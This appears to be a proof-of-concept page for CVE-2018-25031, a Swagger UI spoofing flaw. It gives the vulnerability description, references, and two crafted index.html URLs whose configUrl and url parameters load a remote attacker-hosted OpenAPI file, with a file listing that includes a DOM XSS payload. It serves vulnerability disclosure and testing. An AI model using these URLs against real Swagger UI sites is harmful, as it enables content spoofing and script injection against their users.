CVE-2018-25031 PoC — Swagger UI 输入验证错误漏洞

Source

Associated Vulnerability

Description

.json and .yaml files used to exploit CVE-2018-25031

Readme

### CVE-2018-25031  
<div align="center">
<img src="https://afine.com/wp-content/themes/afine/assets/img/logo_light.svg" align="center" style="width: 40%" />
</div>  



### Description:  
#### Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

  
<br/>   
 
### Screenshot before attack:
<img src="https://github.com/afine-com/CVE-2018-25031/blob/main/1.png" align="center" style="width: 100%" />

### PoC:
```
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
```

### PoC Screenshot after attack:
<img src="https://github.com/afine-com/CVE-2018-25031/blob/main/2.png" align="center" style="width: 100%" />

### References:

<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-25031">https://nvd.nist.gov/vuln/detail/CVE-2018-25031</a><br>
<a href="https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2">https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2</a>

##### Tested on Swagger UI 3.52.1

File Snapshot

 [4.0K]  /data/pocs/bda70fa6f655747f3bd3fb9e65c692b6584a60a6
├── [238K]  1.png
├── [108K]  2.png
├── [1.4K]  DOMXSS.yaml
├── [ 254]  poc.json
├── [ 172]  poc.yaml
└── [1.2K]  README.md

0 directories, 6 files

Remarks